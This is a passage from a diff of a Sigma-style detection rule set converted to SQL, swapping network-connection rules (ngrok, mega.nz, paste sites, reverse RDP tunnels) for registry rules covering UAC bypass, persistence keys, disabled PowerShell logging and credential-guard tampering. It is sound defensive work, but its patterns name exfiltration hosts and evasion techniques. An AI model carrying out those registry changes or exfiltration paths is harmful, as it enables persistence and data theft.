WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 